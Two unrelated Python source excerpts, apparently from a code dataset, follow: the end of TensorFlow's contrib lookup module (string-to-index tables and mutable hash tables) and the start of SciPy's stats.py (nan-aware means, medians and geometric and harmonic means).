from tensorflow.python.ops.lookup_ops import HasherSpec
from tensorflow.python.ops.lookup_ops import HashTable
from tensorflow.python.ops.lookup_ops import IdTableWithHashBuckets
from tensorflow.python.ops.lookup_ops import index_table_from_file
from tensorflow.python.ops.lookup_ops import index_to_string_table_from_file
from tensorflow.python.ops.lookup_ops import InitializableLookupTableBase
from tensorflow.python.ops.lookup_ops import KeyValueTensorInitializer
from tensorflow.python.ops.lookup_ops import LookupInterface
from tensorflow.python.ops.lookup_ops import StrongHashSpec
from tensorflow.python.ops.lookup_ops import TableInitializerBase
from tensorflow.python.ops.lookup_ops import TextFileIdTableInitializer
from tensorflow.python.ops.lookup_ops import TextFileIndex
from tensorflow.python.ops.lookup_ops import TextFileInitializer
from tensorflow.python.ops.lookup_ops import TextFileStringTableInitializer
# pylint: enable=unused-import
from tensorflow.python.training.saver import BaseSaverBuilder
from tensorflow.python.util.deprecation import deprecated
@deprecated("2017-04-10", "Use `index_table_from_file`.")
def string_to_index_table_from_file(vocabulary_file=None,
num_oov_buckets=0,
vocab_size=None,
default_value=-1,
hasher_spec=FastHashSpec,
name=None):
return index_table_from_file(
vocabulary_file, num_oov_buckets, vocab_size, default_value, hasher_spec,
key_dtype=dtypes.string, name=name)
@deprecated("2017-04-10", "Use `index_table_from_tensor`.")
def string_to_index_table_from_tensor(mapping,
num_oov_buckets=0,
default_value=-1,
hasher_spec=FastHashSpec,
name=None):
with ops.name_scope(name, "string_to_index") as scope:
mapping = ops.convert_to_tensor(mapping)
if dtypes.string != mapping.dtype.base_dtype:
raise ValueError("string_to_index_table_from_tensor requires string.")
return index_table_from_tensor(
mapping, num_oov_buckets, default_value, hasher_spec, name=scope)
def index_table_from_tensor(mapping,
num_oov_buckets=0,
default_value=-1,
hasher_spec=FastHashSpec,
dtype=dtypes.string,
name=None):
"""Returns a lookup table that converts a string tensor into int64 IDs.
This operation constructs a lookup table to convert tensor of strings into
int64 IDs. The mapping can be initialized from a string `mapping` 1-D tensor
where each element is a key and corresponding index within the tensor is the
value.
Any lookup of an out-of-vocabulary token will return a bucket ID based on its
hash if `num_oov_buckets` is greater than zero. Otherwise it is assigned the
`default_value`.
The bucket ID range is `[mapping size, mapping size + num_oov_buckets - 1]`.
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
mapping_strings = tf.constant(["emerson", "lake", "palmer"])
table = tf.contrib.lookup.index_table_from_tensor(
mapping=mapping_strings, num_oov_buckets=1, default_value=-1)
features = tf.constant(["emerson", "lake", "and", "palmer"])
ids = table.lookup(features)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, 4, 2]
```
Args:
mapping: A 1-D `Tensor` that specifies the mapping of keys to indices. The
type of this object must be castable to `dtype`.
num_oov_buckets: The number of out-of-vocabulary buckets.
default_value: The value to use for out-of-vocabulary feature values.
Defaults to -1.
hasher_spec: A `HasherSpec` to specify the hash function to use for
assignment of out-of-vocabulary buckets.
dtype: The type of values passed to `lookup`. Only string and integers are
supported.
name: A name for this op (optional).
Returns:
The lookup table to map an input `Tensor` to index `int64` `Tensor`.
Raises:
ValueError: If `mapping` is invalid.
ValueError: If `num_oov_buckets` is negative.
"""
if mapping is None:
raise ValueError("mapping must be specified.")
return lookup_ops.index_table_from_tensor(
vocabulary_list=mapping,
num_oov_buckets=num_oov_buckets,
default_value=default_value,
hasher_spec=hasher_spec,
dtype=dtype,
name=name)
@deprecated(
"2017-01-07", "This op will be removed after the deprecation date. "
"Please switch to index_table_from_tensor and call the lookup "
"method of the returned table.")
def string_to_index(tensor, mapping, default_value=-1, name=None):
"""Maps `tensor` of strings into `int64` indices based on `mapping`.
This operation converts `tensor` of strings into `int64` indices.
The mapping is initialized from a string `mapping` tensor where each element
is a key and corresponding index within the tensor is the value.
Any entry in the input which does not have a corresponding entry in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`
Elements in `mapping` cannot be duplicated, otherwise the initialization
will throw a FailedPreconditionError.
The underlying table must be initialized by calling
`tf.tables_initializer.run()` once.
For example:
```python
mapping_strings = tf.constant(["emerson", "lake", "palmer"])
feats = tf.constant(["emerson", "lake", "and", "palmer"])
ids = tf.contrib.lookup.string_to_index(
feats, mapping=mapping_strings, default_value=-1)
...
tf.tables_initializer().run()
ids.eval() ==> [0, 1, -1, 2]
```
Args:
tensor: A 1-D input `Tensor` with the strings to map to indices.
mapping: A 1-D string `Tensor` that specifies the mapping of strings to
indices.
default_value: The `int64` value to use for out-of-vocabulary strings.
Defaults to -1.
name: A name for this op (optional).
Returns:
The mapped indices. It has the same shape and tensor type (dense or sparse)
as `tensor`.
"""
table = index_table_from_tensor(
mapping=mapping, default_value=default_value, name=name)
return table.lookup(tensor)
def index_to_string_table_from_tensor(mapping, default_value="UNK", name=None):
"""Returns a lookup table that maps a `Tensor` of indices into strings.
This operation constructs a lookup table to map int64 indices into string
values. The mapping is initialized from a string `mapping` 1-D `Tensor` where
each element is a value and the corresponding index within the tensor is the
key.
Any input which does not have a corresponding index in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
mapping_string = tf.constant(["emerson", "lake", "palmer"])
indices = tf.constant([1, 5], tf.int64)
table = tf.contrib.lookup.index_to_string_table_from_tensor(
mapping_string, default_value="UNKNOWN")
values = table.lookup(indices)
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
mapping: A 1-D string `Tensor` that specifies the strings to map from
indices.
default_value: The value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The lookup table to map a string values associated to a given index `int64`
`Tensors`.
Raises:
ValueError: when `mapping` is not set.
"""
if mapping is None:
raise ValueError("mapping must be specified.")
return lookup_ops.index_to_string_table_from_tensor(
vocabulary_list=mapping, default_value=default_value, name=name)
@deprecated(
"2017-01-07", "This op will be removed after the deprecation date. "
"Please switch to index_to_string_table_from_tensor and call the lookup "
"method of the returned table.")
def index_to_string(tensor, mapping, default_value="UNK", name=None):
"""Maps `tensor` of indices into string values based on `mapping`.
This operation converts `int64` indices into string values. The mapping is
initialized from a string `mapping` tensor where each element is a value and
the corresponding index within the tensor is the key.
Any input which does not have a corresponding index in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`
The underlying table must be initialized by calling
`tf.tables_initializer.run()` once.
For example:
```python
mapping_string = tf.constant(["emerson", "lake", "palmer"])
indices = tf.constant([1, 5], tf.int64)
values = tf.contrib.lookup.index_to_string(
indices, mapping=mapping_string, default_value="UNKNOWN")
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
tensor: A `int64` `Tensor` with the indices to map to strings.
mapping: A 1-D string `Tensor` that specifies the strings to map from
indices.
default_value: The string value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The strings values associated to the indices. The resultant dense
feature value tensor has the same shape as the corresponding `indices`.
"""
table = index_to_string_table_from_tensor(
mapping=mapping, default_value=default_value, name=name)
return table.lookup(tensor)
class MutableHashTable(LookupInterface):
"""A generic mutable hash table implementation.
Data can be inserted by calling the insert method. It does not support
initialization via the init method.
Example usage:
```python
table = tf.contrib.lookup.MutableHashTable(key_dtype=tf.string,
value_dtype=tf.int64,
default_value=-1)
table.insert(keys, values)
out = table.lookup(query_keys)
print(out.eval())
```
"""
def __init__(self,
key_dtype,
value_dtype,
default_value,
shared_name=None,
name="MutableHashTable",
checkpoint=True):
"""Creates an empty `MutableHashTable` object.
Creates a table, the type of its keys and values are specified by key_dtype
and value_dtype, respectively.
Args:
key_dtype: the type of the key tensors.
value_dtype: the type of the value tensors.
default_value: The value to use if a key is missing in the table.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
checkpoint: if True, the contents of the table are saved to and restored
from checkpoints. If `shared_name` is empty for a checkpointed table, it
is shared using the table node name.
Returns:
A `MutableHashTable` object.
Raises:
ValueError: If checkpoint is True and no name was specified.
"""
self._default_value = ops.convert_to_tensor(default_value,
dtype=value_dtype)
self._value_shape = self._default_value.get_shape()
# The table must be shared if checkpointing is requested for multi-worker
# training to work correctly. Use the node name if no shared_name has been
# explicitly specified.
use_node_name_sharing = checkpoint and shared_name is None
# pylint: disable=protected-access
if self._default_value.get_shape().ndims == 0:
self._table_ref = gen_lookup_ops._mutable_hash_table_v2(
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
key_dtype=key_dtype,
value_dtype=value_dtype,
name=name)
else:
self._table_ref = gen_lookup_ops._mutable_hash_table_of_tensors_v2(
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
key_dtype=key_dtype,
value_dtype=value_dtype,
value_shape=self._default_value.get_shape(),
name=name)
# pylint: enable=protected-access
super(MutableHashTable, self).__init__(key_dtype, value_dtype,
self._table_ref.op.name.split(
"/")[-1])
if checkpoint:
saveable = MutableHashTable._Saveable(self, name)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as name:
with ops.colocate_with(self._table_ref):
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_size_v2(self._table_ref, name=name)
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. Can be a tensor of any shape. Must match the
table's key_dtype.
name: A name for the operation (optional).
Returns:
A tensor containing the values in the same shape as `keys` using the
table's value type.
Raises:
TypeError: when `keys` do not match the table data types.
"""
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(name, "%s_lookup_table_find" % self._name,
(self._table_ref, keys, self._default_value)) as name:
with ops.colocate_with(self._table_ref):
# pylint: disable=protected-access
values = gen_lookup_ops._lookup_table_find_v2(
self._table_ref, keys, self._default_value, name=name)
values.set_shape(keys.get_shape().concatenate(self._value_shape))
return values
def insert(self, keys, values, name=None):
"""Associates `keys` with `values`.
Args:
keys: Keys to insert. Can be a tensor of any shape. Must match the
table's key type.
values: Values to be associated with keys. Must be a tensor of the same
shape as `keys` and match the table's value type.
name: A name for the operation (optional).
Returns:
The created Operation.
Raises:
TypeError: when `keys` or `values` doesn't match the table data
types.
"""
# pylint: disable=protected-access
lookup_ops._check_table_dtypes(self, keys.dtype, values.dtype)
# pylint: enable=protected-access
with ops.name_scope(name, "%s_lookup_table_insert" % self._name,
[self._table_ref, keys, values]) as name:
with ops.colocate_with(self._table_ref):
# pylint: disable=protected-access
op = gen_lookup_ops._lookup_table_insert_v2(
self._table_ref, keys, values, name=name)
return op
def export(self, name=None):
"""Returns tensors of all keys and values in the table.
Args:
name: A name for the operation (optional).
Returns:
A pair of tensors with the first tensor containing all keys and the
second tensors containing all values in the table.
"""
with ops.name_scope(name, "%s_lookup_table_export_values" % self._name,
[self._table_ref]) as name:
with ops.colocate_with(self._table_ref):
# pylint: disable=protected-access
exported_keys, exported_values = gen_lookup_ops._lookup_table_export_v2(
self._table_ref, self._key_dtype, self._value_dtype, name=name)
exported_values.set_shape(exported_keys.get_shape().concatenate(
self._value_shape))
return exported_keys, exported_values
class _Saveable(BaseSaverBuilder.SaveableObject):
"""SaveableObject implementation for MutableHashTable."""
def __init__(self, table, name):
tensors = table.export()
specs = [
BaseSaverBuilder.SaveSpec(tensors[0], "", name + "-keys"),
BaseSaverBuilder.SaveSpec(tensors[1], "", name + "-values")
]
# pylint: disable=protected-access
super(MutableHashTable._Saveable, self).__init__(table, specs, name)
def restore(self, restored_tensors, unused_restored_shapes):
# pylint: disable=protected-access
with ops.colocate_with(self.op._table_ref):
return gen_lookup_ops._lookup_table_import_v2(
self.op._table_ref, restored_tensors[0], restored_tensors[1])
class MutableDenseHashTable(LookupInterface):
"""A generic mutable hash table implementation using tensors as backing store.
Data can be inserted by calling the insert method. It does not support
initialization via the init method.
It uses "open addressing" with quadratic reprobing to resolve collisions.
Compared to `MutableHashTable` the insert and lookup operations in a
`MutableDenseHashTable` are typically faster, but memory usage can be higher.
However, `MutableDenseHashTable` does not require additional memory for
temporary tensors created during checkpointing and restore operations.
Example usage:
```python
table = tf.contrib.lookup.MutableDenseHashTable(key_dtype=tf.int64,
value_dtype=tf.int64,
default_value=-1,
empty_key=0)
table.insert(keys, values)
out = table.lookup(query_keys)
print(out.eval())
```
"""
# TODO(andreasst): consider extracting common code with MutableHashTable into
# a common superclass.
def __init__(self,
key_dtype,
value_dtype,
default_value,
empty_key,
initial_num_buckets=None,
shared_name=None,
name="MutableDenseHashTable",
checkpoint=True):
"""Creates an empty `MutableDenseHashTable` object.
Creates a table, the type of its keys and values are specified by key_dtype
and value_dtype, respectively.
Args:
key_dtype: the type of the key tensors.
value_dtype: the type of the value tensors.
default_value: The value to use if a key is missing in the table.
empty_key: the key to use to represent empty buckets internally. Must not
be used in insert or lookup operations.
initial_num_buckets: the initial number of buckets.
shared_name: If non-empty, this table will be shared under
the given name across multiple sessions.
name: A name for the operation (optional).
checkpoint: if True, the contents of the table are saved to and restored
from checkpoints. If `shared_name` is empty for a checkpointed table, it
is shared using the table node name.
Returns:
A `MutableHashTable` object.
Raises:
ValueError: If checkpoint is True and no name was specified.
"""
self._default_value = ops.convert_to_tensor(
default_value, dtype=value_dtype)
self._value_shape = self._default_value.get_shape()
# The table must be shared if checkpointing is requested for multi-worker
# training to work correctly. Use the node name if no shared_name has been
# explicitly specified.
use_node_name_sharing = checkpoint and shared_name is None
empty_key = ops.convert_to_tensor(empty_key, dtype=key_dtype)
# pylint: disable=protected-access
self._table_ref = gen_lookup_ops._mutable_dense_hash_table_v2(
empty_key=empty_key,
shared_name=shared_name,
use_node_name_sharing=use_node_name_sharing,
value_dtype=value_dtype,
value_shape=self._value_shape,
initial_num_buckets=initial_num_buckets,
name=name)
# pylint: enable=protected-access
super(MutableDenseHashTable, self).__init__(
key_dtype, value_dtype, self._table_ref.op.name.split("/")[-1])
if checkpoint:
saveable = MutableDenseHashTable._Saveable(self, name)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)
def size(self, name=None):
"""Compute the number of elements in this table.
Args:
name: A name for the operation (optional).
Returns:
A scalar tensor containing the number of elements in this table.
"""
with ops.name_scope(name, "%s_Size" % self._name,
[self._table_ref]) as name:
with ops.colocate_with(self._table_ref):
# pylint: disable=protected-access
return gen_lookup_ops._lookup_table_size_v2(self._table_ref, name=name)
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values.
The `default_value` is used for keys not present in the table.
Args:
keys: Keys to look up. Can be a tensor of any shape. Must match the
table's key_dtype.
name: A name for the operation (optional).
Returns:
A tensor containing the values in the same shape as `keys` using the
table's value type.
Raises:
TypeError: when `keys` do not match the table data types.
"""
if keys.dtype != self._key_dtype:
raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
(self._key_dtype, keys.dtype))
with ops.name_scope(name, "%s_lookup_table_find" % self._name,
[self._table_ref, keys]) as name:
with ops.colocate_with(self._table_ref):
# pylint: disable=protected-access
values = gen_lookup_ops._lookup_table_find_v2(
self._table_ref, keys, self._default_value, name=name)
if keys.get_shape().ndims is not None and keys.get_shape().ndims > 0:
values.set_shape(
tensor_shape.TensorShape([keys.get_shape().dims[0]]).concatenate(
self._value_shape))
return values
def insert(self, keys, values, name=None):
"""Associates `keys` with `values`.
Args:
keys: Keys to insert. Can be a tensor of any shape. Must match the
table's key type.
values: Values to be associated with keys. Must be a tensor of the same
shape as `keys` and match the table's value type.
name: A name for the operation (optional).
Returns:
The created Operation.
Raises:
TypeError: when `keys` or `values` doesn't match the table data
types.
"""
# pylint: disable=protected-access
lookup_ops._check_table_dtypes(self, keys.dtype, values.dtype)
# pylint: enable=protected-access
with ops.name_scope(name, "%s_lookup_table_insert" % self._name,
[self._table_ref, keys, values]) as name:
with ops.colocate_with(self._table_ref):
# pylint: disable=protected-access
op = gen_lookup_ops._lookup_table_insert_v2(
self._table_ref, keys, values, name=name)
return op
def export(self, name=None):
"""Returns tensors of all keys and values in the table.
Args:
name: A name for the operation (optional).
Returns:
A pair of tensors with the first tensor containing all keys and the
second tensors containing all values in the table.
"""
with ops.name_scope(name, "%s_lookup_table_export_values" % self._name,
[self._table_ref]) as name:
with ops.colocate_with(self._table_ref):
# pylint: disable=protected-access
exported_keys, exported_values = gen_lookup_ops._lookup_table_export_v2(
self._table_ref, self._key_dtype, self._value_dtype, name=name)
exported_values.set_shape(exported_keys.get_shape().concatenate(
self._value_shape))
return exported_keys, exported_values
class _Saveable(BaseSaverBuilder.SaveableObject):
"""SaveableObject implementation for MutableDenseHashTable."""
def __init__(self, table, name):
tensors = table.export()
specs = [
BaseSaverBuilder.SaveSpec(tensors[0], "", name + "-keys"),
BaseSaverBuilder.SaveSpec(tensors[1], "", name + "-values")
]
# pylint: disable=protected-access
super(MutableDenseHashTable._Saveable, self).__init__(table, specs, name)
def restore(self, restored_tensors, unused_restored_shapes):
# pylint: disable=protected-access
with ops.colocate_with(self.op._table_ref):
return gen_lookup_ops._lookup_table_import_v2(
self.op._table_ref, restored_tensors[0], restored_tensors[1])
| apache-2.0 |
Srisai85/scipy | scipy/stats/stats.py | 18 | 169352 | # Copyright (c) Gary Strangman. All rights reserved
#
# Disclaimer
#
# This software is provided "as-is". There are no expressed or implied
# warranties of any kind, including, but not limited to, the warranties
# of merchantability and fitness for a given application. In no event
# shall Gary Strangman be liable for any direct, indirect, incidental,
# special, exemplary or consequential damages (including, but not limited
# to, loss of use, data or profits, or business interruption) however
# caused and on any theory of liability, whether in contract, strict
# liability or tort (including negligence or otherwise) arising in any way
# out of the use of this software, even if advised of the possibility of
# such damage.
#
#
# Heavily adapted for use by SciPy 2002 by Travis Oliphant
"""
A collection of basic statistical functions for python. The function
names appear below.
Some scalar functions defined here are also available in the scipy.special
package where they work on arbitrary sized arrays.
Disclaimers: The function list is obviously incomplete and, worse, the
functions are not optimized. All functions have been tested (some more
so than others), but they are far from bulletproof. Thus, as with any
free software, no warranty or guarantee is expressed or implied. :-) A
few extra functions that don't appear in the list below can be found by
interested treasure-hunters. These functions don't necessarily have
both list and array versions but were deemed useful.
Central Tendency
----------------
.. autosummary::
:toctree: generated/
gmean
hmean
mode
Moments
-------
.. autosummary::
:toctree: generated/
moment
variation
skew
kurtosis
normaltest
Moments Handling NaN:
.. autosummary::
:toctree: generated/
nanmean
nanmedian
nanstd
Altered Versions
----------------
.. autosummary::
:toctree: generated/
tmean
tvar
tstd
tsem
describe
Frequency Stats
---------------
.. autosummary::
:toctree: generated/
itemfreq
scoreatpercentile
percentileofscore
histogram
cumfreq
relfreq
Variability
-----------
.. autosummary::
:toctree: generated/
obrientransform
signaltonoise
sem
Trimming Functions
------------------
.. autosummary::
:toctree: generated/
threshold
trimboth
trim1
Correlation Functions
---------------------
.. autosummary::
:toctree: generated/
pearsonr
fisher_exact
spearmanr
pointbiserialr
kendalltau
linregress
theilslopes
Inferential Stats
-----------------
.. autosummary::
:toctree: generated/
ttest_1samp
ttest_ind
ttest_ind_from_stats
ttest_rel
chisquare
power_divergence
ks_2samp
mannwhitneyu
ranksums
wilcoxon
kruskal
friedmanchisquare
combine_pvalues
Probability Calculations
------------------------
.. autosummary::
:toctree: generated/
chisqprob
betai
ANOVA Functions
---------------
.. autosummary::
:toctree: generated/
f_oneway
f_value
Support Functions
-----------------
.. autosummary::
:toctree: generated/
ss
square_of_sums
rankdata
References
----------
.. [CRCProbStat2000] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
from __future__ import division, print_function, absolute_import
import warnings
import math
from collections import namedtuple
from scipy._lib.six import xrange
# Scipy imports.
from scipy._lib.six import callable, string_types
from numpy import array, asarray, ma, zeros
import scipy.special as special
import scipy.linalg as linalg
import numpy as np
from . import distributions
from . import mstats_basic
from ._distn_infrastructure import _lazywhere
from ._stats_mstats_common import find_repeats, linregress, theilslopes
from ._rank import rankdata, tiecorrect
__all__ = ['find_repeats', 'gmean', 'hmean', 'mode', 'tmean', 'tvar',
'tmin', 'tmax', 'tstd', 'tsem', 'moment', 'variation',
'skew', 'kurtosis', 'describe', 'skewtest', 'kurtosistest',
'normaltest', 'jarque_bera', 'itemfreq',
'scoreatpercentile', 'percentileofscore', 'histogram',
'histogram2', 'cumfreq', 'relfreq', 'obrientransform',
'signaltonoise', 'sem', 'zmap', 'zscore', 'threshold',
'sigmaclip', 'trimboth', 'trim1', 'trim_mean', 'f_oneway',
'pearsonr', 'fisher_exact', 'spearmanr', 'pointbiserialr',
'kendalltau', 'linregress', 'theilslopes', 'ttest_1samp',
'ttest_ind', 'ttest_ind_from_stats', 'ttest_rel', 'kstest',
'chisquare', 'power_divergence', 'ks_2samp', 'mannwhitneyu',
'tiecorrect', 'ranksums', 'kruskal', 'friedmanchisquare',
'chisqprob', 'betai',
'f_value_wilks_lambda', 'f_value', 'f_value_multivariate',
'ss', 'square_of_sums', 'fastsort', 'rankdata', 'nanmean',
'nanstd', 'nanmedian', 'combine_pvalues', ]
def _chk_asarray(a, axis):
if axis is None:
a = np.ravel(a)
outaxis = 0
else:
a = np.asarray(a)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
return a, outaxis
def _chk2_asarray(a, b, axis):
if axis is None:
a = np.ravel(a)
b = np.ravel(b)
outaxis = 0
else:
a = np.asarray(a)
b = np.asarray(b)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
if b.ndim == 0:
b = np.atleast_1d(b)
return a, b, outaxis
def _contains_nan(a, nan_policy='propagate'):
if nan_policy not in ('propagate', 'raise', 'omit'):
raise ValueError("nan_policy must be either 'propagate', 'raise', or "
"'ignore'")
try:
# Calling np.sum to avoid creating a huge array into memory
# e.g. np.isnan(a).any()
with np.errstate(invalid='ignore'):
contains_nan = np.isnan(np.sum(a))
except TypeError:
# If the check cannot be properly performed we fallback to omiting
# nan values and raising a warning. This can happen when attempting to
# sum things that are not numbers (e.g. as in the function `mode`).
contains_nan = False
nan_policy = 'omit'
warnings.warn("The input array could not be properly checked for nan "
"values. nan values will be ignored.", RuntimeWarning)
if contains_nan and nan_policy == 'raise':
raise ValueError("The input contains nan values")
return (contains_nan, nan_policy)
#######
# NAN friendly functions
########
@np.deprecate(message="scipy.stats.nanmean is deprecated in scipy 0.15.0 "
"in favour of numpy.nanmean.")
def nanmean(x, axis=0):
"""
Compute the mean over the given axis ignoring nans.
Parameters
----------
x : ndarray
Input array.
axis : int or None, optional
Axis along which the mean is computed. Default is 0.
If None, compute over the whole array `x`.
Returns
-------
m : float
The mean of `x`, ignoring nans.
See Also
--------
nanstd, nanmedian
Examples
--------
>>> from scipy import stats
>>> a = np.linspace(0, 4, 3)
>>> a
array([ 0., 2., 4.])
>>> a[-1] = np.nan
>>> stats.nanmean(a)
1.0
"""
x, axis = _chk_asarray(x, axis)
x = x.copy()
Norig = x.shape[axis]
mask = np.isnan(x)
factor = 1.0 - np.sum(mask, axis) / Norig
x[mask] = 0.0
return np.mean(x, axis) / factor
@np.deprecate(message="scipy.stats.nanstd is deprecated in scipy 0.15 "
"in favour of numpy.nanstd.\nNote that numpy.nanstd "
"has a different signature.")
def nanstd(x, axis=0, bias=False):
"""
Compute the standard deviation over the given axis, ignoring nans.
Parameters
----------
x : array_like
Input array.
axis : int or None, optional
Axis along which the standard deviation is computed. Default is 0.
If None, compute over the whole array `x`.
bias : bool, optional
If True, the biased (normalized by N) definition is used. If False
(default), the unbiased definition is used.
Returns
-------
s : float
The standard deviation.
See Also
--------
nanmean, nanmedian
Examples
--------
>>> from scipy import stats
>>> a = np.arange(10, dtype=float)
>>> a[1:3] = np.nan
>>> np.std(a)
nan
>>> stats.nanstd(a)
2.9154759474226504
>>> stats.nanstd(a.reshape(2, 5), axis=1)
array([ 2.0817, 1.5811])
>>> stats.nanstd(a.reshape(2, 5), axis=None)
2.9154759474226504
"""
x, axis = _chk_asarray(x, axis)
x = x.copy()
Norig = x.shape[axis]
mask = np.isnan(x)
Nnan = np.sum(mask, axis) * 1.0
n = Norig - Nnan
x[mask] = 0.0
m1 = np.sum(x, axis) / n
if axis:
d = x - np.expand_dims(m1, axis)
else:
d = x - m1
d *= d
m2 = np.sum(d, axis) - m1 * m1 * Nnan
if bias:
m2c = m2 / n
else:
m2c = m2 / (n - 1.0)
return np.sqrt(m2c)
def _nanmedian(arr1d): # This only works on 1d arrays
"""Private function for rank a arrays. Compute the median ignoring Nan.
Parameters
----------
arr1d : ndarray
Input array, of rank 1.
Results
-------
m : float
The median.
"""
x = arr1d.copy()
c = np.isnan(x)
s = np.where(c)[0]
if s.size == x.size:
warnings.warn("All-NaN slice encountered", RuntimeWarning)
return np.nan
elif s.size != 0:
# select non-nans at end of array
enonan = x[-s.size:][~c[-s.size:]]
# fill nans in beginning of array with non-nans of end
x[s[:enonan.size]] = enonan
# slice nans away
x = x[:-s.size]
return np.median(x, overwrite_input=True)
@np.deprecate(message="scipy.stats.nanmedian is deprecated in scipy 0.15 "
"in favour of numpy.nanmedian.")
def nanmedian(x, axis=0):
"""
Compute the median along the given axis ignoring nan values.
Parameters
----------
x : array_like
Input array.
axis : int or None, optional
Axis along which the median is computed. Default is 0.
If None, compute over the whole array `x`.
Returns
-------
m : float
The median of `x` along `axis`.
See Also
--------
nanstd, nanmean, numpy.nanmedian
Examples
--------
>>> from scipy import stats
>>> a = np.array([0, 3, 1, 5, 5, np.nan])
>>> stats.nanmedian(a)
array(3.0)
>>> b = np.array([0, 3, 1, 5, 5, np.nan, 5])
>>> stats.nanmedian(b)
array(4.0)
Example with axis:
>>> c = np.arange(30.).reshape(5,6)
>>> idx = np.array([False, False, False, True, False] * 6).reshape(5,6)
>>> c[idx] = np.nan
>>> c
array([[ 0., 1., 2., nan, 4., 5.],
[ 6., 7., nan, 9., 10., 11.],
[ 12., nan, 14., 15., 16., 17.],
[ nan, 19., 20., 21., 22., nan],
[ 24., 25., 26., 27., nan, 29.]])
>>> stats.nanmedian(c, axis=1)
array([ 2. , 9. , 15. , 20.5, 26. ])
"""
x, axis = _chk_asarray(x, axis)
if x.ndim == 0:
return float(x.item())
if hasattr(np, 'nanmedian'): # numpy 1.9 faster for some cases
return np.nanmedian(x, axis)
x = np.apply_along_axis(_nanmedian, axis, x)
if x.ndim == 0:
x = float(x.item())
return x
#####################################
# CENTRAL TENDENCY #
#####################################
def gmean(a, axis=0, dtype=None):
"""
Compute the geometric mean along the specified axis.
Returns the geometric average of the array elements.
That is: n-th root of (x1 * x2 * ... * xn)
Parameters
----------
a : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the geometric mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If dtype is not specified, it defaults to the
dtype of a, unless a has an integer dtype with a precision less than
that of the default platform integer. In that case, the default
platform integer is used.
Returns
-------
gmean : ndarray
see dtype parameter above
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
hmean : Harmonic mean
Notes
-----
The geometric average is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
Use masked arrays to ignore any non-finite values in the input or that
arise in the calculations such as Not a Number and infinity because masked
arrays automatically mask any non-finite values.
"""
if not isinstance(a, np.ndarray): # if not an ndarray object attempt to convert it
log_a = np.log(np.array(a, dtype=dtype))
elif dtype: # Must change the default dtype allowing array type
if isinstance(a, np.ma.MaskedArray):
log_a = np.log(np.ma.asarray(a, dtype=dtype))
else:
log_a = np.log(np.asarray(a, dtype=dtype))
else:
log_a = np.log(a)
return np.exp(log_a.mean(axis=axis))
def hmean(a, axis=0, dtype=None):
"""
Calculates the harmonic mean along the specified axis.
That is: n / (1/x1 + 1/x2 + ... + 1/xn)
Parameters
----------
a : array_like
Input array, masked array or object that can be converted to an array.
axis : int or None, optional
Axis along which the harmonic mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If `dtype` is not specified, it defaults to the
dtype of `a`, unless `a` has an integer `dtype` with a precision less
than that of the default platform integer. In that case, the default
platform integer is used.
Returns
-------
hmean : ndarray
see `dtype` parameter above
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
gmean : Geometric mean
Notes
-----
The harmonic mean is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
Use masked arrays to ignore any non-finite values in the input or that
arise in the calculations such as Not a Number and infinity.
"""
if not isinstance(a, np.ndarray):
a = np.array(a, dtype=dtype)
if np.all(a > 0): # Harmonic mean only defined if greater than zero
if isinstance(a, np.ma.MaskedArray):
size = a.count(axis)
else:
if axis is None:
a = a.ravel()
size = a.shape[0]
else:
size = a.shape[axis]
return size / np.sum(1.0/a, axis=axis, dtype=dtype)
else:
raise ValueError("Harmonic mean only defined if all elements greater than zero")
def mode(a, axis=0, nan_policy='propagate'):
"""
Returns an array of the modal (most common) value in the passed array.
If there is more than one such value, only the first is returned.
The bin-count for the modal bins is also returned.
Parameters
----------
a : array_like
n-dimensional array of which to find mode(s).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
